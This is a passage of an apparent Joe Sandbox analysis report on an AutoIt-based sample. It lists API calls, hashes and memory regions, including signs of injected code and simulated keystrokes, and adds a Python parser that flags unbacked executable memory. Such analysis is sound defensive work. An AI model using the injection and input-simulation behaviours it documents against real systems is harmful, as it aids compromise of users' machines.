                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 04fdcc3eb9afffdf4ee60d1aedf11d51fcba5f06e99f2a16c6990c654fc0c756
                                                                      • Instruction ID: 21500f50dec0f38ffafcb2b33b58966c143d6ea654afe4d58f5d4c4c1a1df0a6
                                                                      • Opcode Fuzzy Hash: 04fdcc3eb9afffdf4ee60d1aedf11d51fcba5f06e99f2a16c6990c654fc0c756
                                                                      • Instruction Fuzzy Hash: AFF0A971009342CFCB348F20D4D0926BBE0EF4232932099BEE1EE82620C7B29844EF00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE ref: 00BA2DC4
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_wcslen
                                                                      • String ID:
                                                                      • API String ID: 541455249-0
                                                                      • Opcode ID: 97b150eb587755d5b6787e175e2ad53dc8c3040c95d2b7ac1c4fd9cc4d802c97
                                                                      • Instruction ID: 7ff2aad9927b9c32ef9265d81173c0603f1f13ea7cd3baeb5a507e829f469df2
                                                                      • Opcode Fuzzy Hash: 97b150eb587755d5b6787e175e2ad53dc8c3040c95d2b7ac1c4fd9cc4d802c97
                                                                      • Instruction Fuzzy Hash: BCE0C2B2A042245BCB21A2989C06FEE77EDDFC8790F0400B1FD09E7248DA70AD8086A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 2638373210-0
                                                                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                      • Instruction ID: 73931d5e4961ea489cebaffdaf34732921d92e89d4ee116c9e83bb36f9ad8383
                                                                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                      • Instruction Fuzzy Hash: AEE048B46097005FDF395A28A8517F677D49F4A300F00045EF5AB82352E5726855964D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BA3908
                                                                        • Part of subcall function 00BAD730: GetInputState.USER32 ref: 00BAD807
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
                                                                        • Part of subcall function 00BA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BA314E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                      • String ID:
                                                                      • API String ID: 3667716007-0
                                                                      • Opcode ID: e2f64e3a5cd8b4a281418dcec9ac47b860a156821fb4ecfade232dc197ec6bfd
                                                                      • Instruction ID: 0dfa7a4822861e06f2200394e4163edca7e75a1fda7a277f46385f1528906e64
                                                                      • Opcode Fuzzy Hash: e2f64e3a5cd8b4a281418dcec9ac47b860a156821fb4ecfade232dc197ec6bfd
                                                                      • Instruction Fuzzy Hash: E0E0863230C24407CA08BB78A8566BDA7D9DBD3751F4455BEF54753162CE2549494351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000), ref: 00BE03B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: d78bbfb6294b15b031dc30e3127ac009dde8d443daf58e21cdd09328d1cad1d2
                                                                      • Instruction ID: 3cc84f7dd9126b4b376c48b0668a263ad53a2109b4972fa5bb7d7412beff5882
                                                                      • Opcode Fuzzy Hash: d78bbfb6294b15b031dc30e3127ac009dde8d443daf58e21cdd09328d1cad1d2
                                                                      • Instruction Fuzzy Hash: F2D06C3205010DBBDF028F84DD46EDE3BAAFB48714F014000BE1866020C732E821AB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SystemParametersInfoW.USER32 ref: 00BA1CBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3098949447-0
                                                                      • Opcode ID: 7709a27e67345eca47b616fb774b9322a94496ac67a05e789f7669d6458fb733
                                                                      • Instruction ID: 3610ffe388d51e4f088d85643309c2dd117da9d5fd5c58a8e247d8c4b16269eb
                                                                      • Opcode Fuzzy Hash: 7709a27e67345eca47b616fb774b9322a94496ac67a05e789f7669d6458fb733
                                                                      • Instruction Fuzzy Hash: 8DC09B36290304DFF3144B94BC4AF1C7754A348B00F044001F64D655F3C3A11450F750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA5773
                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00C176DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1214770103-0
                                                                      • Opcode ID: 0c6ccfa3e4e4badac95642a3f0c40e76be4e9b942c864f3f3b930dab2e1f25b2
                                                                      • Instruction ID: d37116860e8317b45dde097dc74cd136926e98896a0ab53a70a60515c092b09b
                                                                      • Opcode Fuzzy Hash: 0c6ccfa3e4e4badac95642a3f0c40e76be4e9b942c864f3f3b930dab2e1f25b2
                                                                      • Instruction Fuzzy Hash: 858181306087019FCB14EF28C491BA9B7F1BF8A350F04465DF8965B292DB34EE85DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 182fe8f8996360e5b2391b347e9a4fb8961b35c0c630172aea8f7baf5e4578f7
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 6B31BD75A0010A9BC718CF59D880AB9FBE6FB49300B2486F5E809CB656D771EDC1CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 00112311
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: 2436dda43fbfd4e006e95c97404430caaaa607c6935cafd35b0f4569ef21dbe2
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: 70E09A7494010DAFDB00EFA4D5496EE7BB4EF04301F1005A1FD0596680DB309A648A62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 00112311
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: e2df254de8c2fb3be45f9621f48da09837082d860dac535b2d744f78e974596e
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: B4E0BF7494010D9FDB00EFB4D5496AE7BB4EF04301F100561FD0192280D73099608A62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
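The two Sleep entries above are the only functions in this section whose memory dump source is not backed by a PE ("based on PE: false", region 00110000, protection field 00000040), which is the shape of code that was written into process 3 rather than loaded from the AutoIt image at 00BA0000. The following parser is an added example, not part of the Joe Sandbox report or of its IDA plugin: it reads the entry text in the format used on this page, decodes the API call lines (including the "Part of subcall function" form and the parenthesis-free form), splits the .sdmp file name into fields, and flags executable regions that are not image-backed. The field order of the .sdmp name (process index, dump phase, dump id, base address, page protection, state, memory type) is an assumption inferred from the values on this page, and the protection and type constants are the standard winnt.h values; the sample entry is constructed from lines on this page.

```python
"""Parse Joe Sandbox function-entry text as it appears on this report page.

Added example, not Joe Sandbox code. The meaning of the .sdmp name fields is
an assumption inferred from the values on the page, not documented semantics.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample built from lines on this page: the Sleep call in the
# unbacked 0x110000 region plus two API-line variants from the AutoIt image.
SAMPLE_ENTRY = """\
APIs
• Sleep.KERNELBASE(000001F4), ref: 00112311
  • Part of subcall function 00BA5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA5773
• SystemParametersInfoW.USER32 ref: 00BA1CBC
Memory Dump Source
• Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
"""

# Standard Win32 constants from winnt.h.
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
MEM_IMAGE = 0x1000000

# "Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker;
# args are optional because some lines on the page carry none.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
SDMP_RE = re.compile(
    r"Source File: (?P<name>[0-9A-F.]+\.sdmp), Offset: (?P<offset>[0-9A-F]+), "
    r"based on PE: (?P<pe>true|false)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                 # address of the call site
    caller: Optional[int]    # subcall function address, if the line had one


@dataclass
class DumpSource:
    process: int
    phase: int
    base: int
    protect: int
    mem_type: int
    pe_backed: bool

    def is_unbacked_executable(self) -> bool:
        """Executable memory that is neither PE-based nor MEM_IMAGE: the
        injected-code shape of the 0x110000 region on this page."""
        return bool(self.protect & EXEC_MASK) and not self.pe_backed and self.mem_type != MEM_IMAGE


def parse_api_line(line: str) -> Optional[ApiCall]:
    text = line.strip().lstrip("• ").strip()
    m = API_RE.match(text)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    caller = int(m["caller"], 16) if m["caller"] else None
    return ApiCall(m["name"], m["module"], args, int(m["ref"], 16), caller)


def parse_dump_source(line: str) -> Optional[DumpSource]:
    m = SDMP_RE.search(line)
    if not m:
        return None
    f = m["name"][: -len(".sdmp")].split(".")
    # Assumed field order: process, phase, dump id, base, protection, state, type, extra.
    return DumpSource(int(f[0], 16), int(f[1], 16), int(f[3], 16),
                      int(f[4], 16), int(f[6], 16), m["pe"] == "true")


def sleep_milliseconds(call: ApiCall) -> Optional[int]:
    """Decode the hex dwMilliseconds argument of a Sleep call; None if unknown."""
    if call.name == "Sleep" and call.args and call.args[0] != "?":
        return int(call.args[0], 16)
    return None


def parse_entry(text: str) -> Tuple[List[ApiCall], Optional[DumpSource]]:
    calls, source = [], None
    for line in text.splitlines():
        call = parse_api_line(line)
        if call:
            calls.append(call)
            continue
        src = parse_dump_source(line)
        if src:
            source = src
    return calls, source


if __name__ == "__main__":
    calls, src = parse_entry(SAMPLE_ENTRY)
    for c in calls:
        print(f"{c.name}.{c.module} at {c.ref:08X} args={c.args} caller={c.caller}")
    print("unbacked executable region:", src.is_unbacked_executable())
```

Run over the page's own entries, the same two checks separate the AutoIt runtime functions (image-backed, PAGE_EXECUTE_READ, MEM_IMAGE) from the 0x110000 region (PAGE_EXECUTE_READWRITE, MEM_PRIVATE, no PE), and decode the Sleep argument 000001F4 as a 500 ms delay.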

                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C3961A
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C3965B
                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C3969F
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C396C9
                                                                      • SendMessageW.USER32 ref: 00C396F2
                                                                      • GetKeyState.USER32(00000011), ref: 00C3978B
                                                                      • GetKeyState.USER32(00000009), ref: 00C39798
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C397AE
                                                                      • GetKeyState.USER32(00000010), ref: 00C397B8
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C397E9
                                                                      • SendMessageW.USER32 ref: 00C39810
                                                                      • SendMessageW.USER32(?,00001030,?,00C37E95), ref: 00C39918
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C3992E
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C39941
                                                                      • SetCapture.USER32(?), ref: 00C3994A
                                                                      • ClientToScreen.USER32(?,?), ref: 00C399AF
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C399BC
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C399D6
                                                                      • ReleaseCapture.USER32 ref: 00C399E1
                                                                      • GetCursorPos.USER32(?), ref: 00C39A19
                                                                      • ScreenToClient.USER32(?,?), ref: 00C39A26
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C39A80
                                                                      • SendMessageW.USER32 ref: 00C39AAE
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C39AEB
                                                                      • SendMessageW.USER32 ref: 00C39B1A
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C39B3B
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C39B4A
                                                                      • GetCursorPos.USER32(?), ref: 00C39B68
                                                                      • ScreenToClient.USER32(?,?), ref: 00C39B75
                                                                      • GetParent.USER32(?), ref: 00C39B93
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C39BFA
                                                                      • SendMessageW.USER32 ref: 00C39C2B
                                                                      • ClientToScreen.USER32(?,?), ref: 00C39C84
                                                                      • TrackPopupMenuEx.USER32 ref: 00C39CB4
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C39CDE
                                                                      • SendMessageW.USER32 ref: 00C39D01
                                                                      • ClientToScreen.USER32(?,?), ref: 00C39D4E
                                                                      • TrackPopupMenuEx.USER32 ref: 00C39D82
                                                                        • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C39E05
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                      • String ID: @GUI_DRAGID$F$H`
                                                                      • API String ID: 3429851547-1055229456
                                                                      • Opcode ID: 3df74d4563ddc5ca1a98571fa8d6d019600d32d5bf2b6da34b7487a93eee6d5d
                                                                      • Instruction ID: 44eb61b8c8d0c5f2ad4016222db4732a933fbf9ffb495dad83f0e73121cbfec0
                                                                      • Opcode Fuzzy Hash: 3df74d4563ddc5ca1a98571fa8d6d019600d32d5bf2b6da34b7487a93eee6d5d
                                                                      • Instruction Fuzzy Hash: F9429D30225600AFD724CF28CC85FAABBF5FF49310F144619FAA9972A1D7B1A950CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00C348F3
                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00C34908
                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00C34927
                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00C3494B
                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00C3495C
                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00C3497B
                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00C349AE
                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00C349D4
                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00C34A0F
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C34A56
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C34A7E
                                                                      • IsMenu.USER32(?), ref: 00C34A97
                                                                      • GetMenuItemInfoW.USER32 ref: 00C34AF2
                                                                      • GetMenuItemInfoW.USER32 ref: 00C34B20
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C34B94
                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00C34BE3
                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00C34C82
                                                                      • wsprintfW.USER32 ref: 00C34CAE
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C34CC9
                                                                      • GetWindowTextW.USER32 ref: 00C34CF1
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C34D13
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C34D33
                                                                      • GetWindowTextW.USER32 ref: 00C34D5A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                      • String ID: %d/%02d/%02d
                                                                      • API String ID: 4054740463-328681919
                                                                      • Opcode ID: 70c523a670e091f4b7540ceaad2486d19caf78b355d5ef970f6e5b4d4d994119
                                                                      • Instruction ID: c72c2e1ee7cd4d64845e6dbd2c49cf0b99fb17f8a84928fffbf25588f27438f9
                                                                      • Opcode Fuzzy Hash: 70c523a670e091f4b7540ceaad2486d19caf78b355d5ef970f6e5b4d4d994119
                                                                      • Instruction Fuzzy Hash: 2512F171620214ABEB288F65CC49FBE7BF8EF49310F144169F525EB2E1DB74AA41CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00BBF998
                                                                      • FindWindowW.USER32 ref: 00BFF474
                                                                      • IsIconic.USER32(00000000), ref: 00BFF47D
                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00BFF48A
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00BFF494
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFF4AA
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00BFF4B1
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFF4BD
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFF4CE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFF4D6
                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00BFF4DE
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00BFF4E1
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF4F6
                                                                      • keybd_event.USER32 ref: 00BFF501
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF50B
                                                                      • keybd_event.USER32 ref: 00BFF510
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF519
                                                                      • keybd_event.USER32 ref: 00BFF51E
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF528
                                                                      • keybd_event.USER32 ref: 00BFF52D
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00BFF530
                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00BFF557
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
